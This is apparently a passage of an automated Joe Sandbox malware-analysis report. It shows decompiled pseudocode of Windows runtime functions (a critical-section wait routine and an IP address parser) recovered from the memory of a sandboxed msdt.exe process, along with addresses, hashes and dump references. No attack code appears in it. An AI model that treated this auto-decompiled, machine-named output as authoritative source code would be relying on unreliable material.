                                                                    0x025f2379
                                                                    0x025f237a
                                                                    0x025f237f
                                                                    0x025f237f
                                                                    0x025f2385
                                                                    0x025f2386
                                                                    0x025f2389
                                                                    0x025f238e
                                                                    0x025f2390
                                                                    0x025b5378
                                                                    0x025b537c
                                                                    0x025f2396
                                                                    0x025f2396
                                                                    0x025f2397
                                                                    0x025f239c
                                                                    0x025f23a2
                                                                    0x025f23a3
                                                                    0x025f23a6
                                                                    0x025f23ab
                                                                    0x025f23ad
                                                                    0x00000000
                                                                    0x025f23b3
                                                                    0x025f23b3
                                                                    0x025f23b4
                                                                    0x025f23b9
                                                                    0x025f23ba
                                                                    0x025f23ba
                                                                    0x025f23bc
                                                                    0x025f23bf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e9153
                                                                    0x025e9158
                                                                    0x025e915a
                                                                    0x025e915e
                                                                    0x025e9160
                                                                    0x00000000
                                                                    0x025e9166
                                                                    0x025e9166
                                                                    0x025e9171
                                                                    0x025e9176
                                                                    0x025e9176
                                                                    0x00000000
                                                                    0x025e9160
                                                                    0x025f23c6
                                                                    0x025f23cb
                                                                    0x025f23d7
                                                                    0x025f23d7
                                                                    0x025f23ad
                                                                    0x025f2390
                                                                    0x025f2373
                                                                    0x025f233f
                                                                    0x025f233f
                                                                    0x00000000
                                                                    0x025f233f
                                                                    0x025f2291
                                                                    0x025f2291
                                                                    0x025f2293
                                                                    0x025f2295
                                                                    0x025f229a
                                                                    0x025f22a1
                                                                    0x025f22a3
                                                                    0x025f22a7
                                                                    0x025f22a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22ab
                                                                    0x025f22ad
                                                                    0x025f22af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22af
                                                                    0x025f22b1
                                                                    0x025f22b4
                                                                    0x025f22b4
                                                                    0x025f22b6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f22b6
                                                                    0x025f228f
                                                                    0x00000000
                                                                    0x025f226d
                                                                    0x025b53cb
                                                                    0x025b53ce
                                                                    0x025b53d0
                                                                    0x025b53d4
                                                                    0x025b53d6
                                                                    0x00000000
                                                                    0x025b53d8
                                                                    0x025b53e3
                                                                    0x025b53ea
                                                                    0x025b53ea
                                                                    0x025b53d6
                                                                    0x00000000

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 025F2328
                                                                    • RTL: Resource at %p, xrefs: 025F230B
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-871070163
                                                                    • Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                                                    • Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
                                                                    • Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                                                    • Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025BEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 51%
                                                                    			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E025ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x267793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025916C0(_t39);
				} else {
					_t40 = E0258F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x267793c; // 0x0
								_push(_t85);
								_t44 = E02591F28(_t71);
							} else {
								_t44 = E0258F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02612306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E025BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26720c0;
								if(_t85 != 0x26720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0261217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E025E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                    0x025bec56
                                                                    0x025bec56
                                                                    0x025bec56
                                                                    0x025bec5c
                                                                    0x025bec64
                                                                    0x025f23e6
                                                                    0x025f23eb
                                                                    0x025f23eb
                                                                    0x025bec6a
                                                                    0x025bec6c
                                                                    0x025bec6f
                                                                    0x025f23f3
                                                                    0x025f23f8
                                                                    0x025f23fa
                                                                    0x025f23fc
                                                                    0x025bec75
                                                                    0x025bec76
                                                                    0x025bec76
                                                                    0x025bec7b
                                                                    0x025bec7c
                                                                    0x025bec7e
                                                                    0x025f2406
                                                                    0x025f2407
                                                                    0x025f240c
                                                                    0x025f240d
                                                                    0x025f240d
                                                                    0x025f240d
                                                                    0x025f2414
                                                                    0x025f2417
                                                                    0x025f241e
                                                                    0x025f2435
                                                                    0x025f2438
                                                                    0x025f243c
                                                                    0x025f243f
                                                                    0x025f2442
                                                                    0x025f2443
                                                                    0x025f2446
                                                                    0x025f2449
                                                                    0x025f2453
                                                                    0x025f2455
                                                                    0x025f245b
                                                                    0x025f245b
                                                                    0x025beb99
                                                                    0x025beb99
                                                                    0x025beb9c
                                                                    0x025beb9d
                                                                    0x025beb9f
                                                                    0x025beba2
                                                                    0x025f2465
                                                                    0x025f246b
                                                                    0x025f246d
                                                                    0x025beba8
                                                                    0x025beba9
                                                                    0x025beba9
                                                                    0x025bebae
                                                                    0x025bebb3
                                                                    0x025bebb9
                                                                    0x025bebbb
                                                                    0x025f2513
                                                                    0x025f2514
                                                                    0x025f2519
                                                                    0x025f251b
                                                                    0x025bec2a
                                                                    0x025bec2d
                                                                    0x025bec33
                                                                    0x025bec36
                                                                    0x025bec3a
                                                                    0x025bec3e
                                                                    0x025bec40
                                                                    0x025bec47
                                                                    0x025bec47
                                                                    0x025bec40
                                                                    0x025922c6
                                                                    0x025bebc1
                                                                    0x025bebc1
                                                                    0x025bebc5
                                                                    0x025bec9a
                                                                    0x025bec9a
                                                                    0x025bebd6
                                                                    0x025bebd6
                                                                    0x00000000
                                                                    0x025bebbb
                                                                    0x025f2477
                                                                    0x025f247c
                                                                    0x025f2486
                                                                    0x025f248b
                                                                    0x025f2496
                                                                    0x025f249b
                                                                    0x025f249d
                                                                    0x025f24a0
                                                                    0x025f24a3
                                                                    0x025f24aa
                                                                    0x025f24aa
                                                                    0x025f24a5
                                                                    0x025f24a5
                                                                    0x025f24a5
                                                                    0x025f24ac
                                                                    0x025f24af
                                                                    0x025f24b0
                                                                    0x025f24b3
                                                                    0x025f24b9
                                                                    0x025f24ba
                                                                    0x025f24bb
                                                                    0x025f24c6
                                                                    0x025f24cb
                                                                    0x025f24cd
                                                                    0x025f24d0
                                                                    0x025f24d1
                                                                    0x025f24d4
                                                                    0x025f24d6
                                                                    0x025f24d9
                                                                    0x025f24d9
                                                                    0x025f24dc
                                                                    0x025f24df
                                                                    0x025f24e1
                                                                    0x025f24e7
                                                                    0x025f24e9
                                                                    0x025f24ec
                                                                    0x025f24ef
                                                                    0x025f24f2
                                                                    0x025f24f2
                                                                    0x025f24ef
                                                                    0x025f24e7
                                                                    0x025f24fa
                                                                    0x025f24ff
                                                                    0x025f2501
                                                                    0x025f2503
                                                                    0x025f2506
                                                                    0x025f250b
                                                                    0x025beb8c
                                                                    0x025beb93
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025beb93
                                                                    0x00000000
                                                                    0x025beb99
                                                                    0x025bec85
                                                                    0x025bec85
                                                                    0x025bec85
                                                                    0x00000000

                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 025F24FA
                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                    • API String ID: 0-3177188983
                                                                    • Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                                                    • Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
                                                                    • Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                                                    • Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025CFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E025CEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E025CEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E025C685D(_t167, 4) == 0) {
								if(E025C685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E025C685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E025C685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E025CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E025CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                    0x025cfcd1
                                                                    0x025cfcd6
                                                                    0x025cfcd9
                                                                    0x025cfcdc
                                                                    0x025cfcdf
                                                                    0x025cfce2
                                                                    0x025cfce5
                                                                    0x025cfce8
                                                                    0x025cfceb
                                                                    0x025cfced
                                                                    0x025cfced
                                                                    0x025cfcf3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025cfcfc
                                                                    0x025cfcfe
                                                                    0x025cfdc1
                                                                    0x025fecbd
                                                                    0x00000000
                                                                    0x025feccc
                                                                    0x025feccc
                                                                    0x025fecd2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fecdf
                                                                    0x025fece0
                                                                    0x025fece4
                                                                    0x025feceb
                                                                    0x025fecee
                                                                    0x025feca8
                                                                    0x025feca8
                                                                    0x025fecaa
                                                                    0x025cfd76
                                                                    0x025cfd79
                                                                    0x025cfdb4
                                                                    0x025cfdb5
                                                                    0x025cfdb6
                                                                    0x00000000
                                                                    0x025cfdb6
                                                                    0x025cfd7e
                                                                    0x025fecfc
                                                                    0x025cfe2f
                                                                    0x00000000
                                                                    0x025cfe2f
                                                                    0x025fed08
                                                                    0x025fed0f
                                                                    0x025fed17
                                                                    0x025fed1b
                                                                    0x00000000
                                                                    0x025fed1b
                                                                    0x025cfd88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025cfd94
                                                                    0x025cfd99
                                                                    0x025cfda1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025cfdb0
                                                                    0x00000000
                                                                    0x025cfdb0
                                                                    0x025fecbd
                                                                    0x025cfdc7
                                                                    0x025cfdcb
                                                                    0x00000000
                                                                    0x025cfdd7
                                                                    0x025cfde3
                                                                    0x025cfe06
                                                                    0x025e1fe7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e1fef
                                                                    0x025e1ff0
                                                                    0x025e1ff4
                                                                    0x025e1ff7
                                                                    0x025e1ffa
                                                                    0x025e1ffd
                                                                    0x025e2000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fecf1
                                                                    0x00000000
                                                                    0x025fecf1
                                                                    0x00000000
                                                                    0x025cfe06
                                                                    0x025cfde8
                                                                    0x025cfdec
                                                                    0x025cfdef
                                                                    0x025cfdf2
                                                                    0x00000000
                                                                    0x025cfdf2
                                                                    0x025cfdcb
                                                                    0x025cfd04
                                                                    0x025cfd05
                                                                    0x025fec67
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fec6f
                                                                    0x00000000
                                                                    0x025fec6f
                                                                    0x025cfd13
                                                                    0x025cfd3c
                                                                    0x025cfd40
                                                                    0x025fec75
                                                                    0x025fec7a
                                                                    0x00000000
                                                                    0x025fec8a
                                                                    0x025fec8a
                                                                    0x025fec90
                                                                    0x025fecb2
                                                                    0x025cfd73
                                                                    0x025cfd73
                                                                    0x00000000
                                                                    0x025cfd73
                                                                    0x025fec95
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025feca1
                                                                    0x025feca4
                                                                    0x025feca5
                                                                    0x00000000
                                                                    0x025feca5
                                                                    0x025fec7a
                                                                    0x025cfd4a
                                                                    0x00000000
                                                                    0x025cfd6e
                                                                    0x025cfd6e
                                                                    0x025cfd71
                                                                    0x00000000
                                                                    0x025cfd71
                                                                    0x025cfd4a
                                                                    0x025cfd21
                                                                    0x025da3a1
                                                                    0x00000000
                                                                    0x025da3a1
                                                                    0x025cfd36
                                                                    0x025e200b
                                                                    0x025e2012
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025e2018
                                                                    0x00000000
                                                                    0x025e2018
                                                                    0x00000000
                                                                    0x025cfd36
                                                                    0x025cfe0f
                                                                    0x025cfe16
                                                                    0x025da3ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025da3b3
                                                                    0x025da3b3
                                                                    0x025cfe1f
                                                                    0x025fed25
                                                                    0x025fed86
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fed91
                                                                    0x025fed95
                                                                    0x025fed95
                                                                    0x025fed9a
                                                                    0x025fedad
                                                                    0x025fedb3
                                                                    0x025fedba
                                                                    0x025fedc4
                                                                    0x025fedc9
                                                                    0x00000000
                                                                    0x025fedcc
                                                                    0x025fed2a
                                                                    0x025fed55
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fed61
                                                                    0x025fed66
                                                                    0x025fed6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fed7d
                                                                    0x00000000
                                                                    0x025fed7d
                                                                    0x025fed30
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025fed3c
                                                                    0x025fed43
                                                                    0x025fed4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: __fassign
                                                                    • String ID:
                                                                    • API String ID: 3965848254-0
                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                    • Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                    • Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%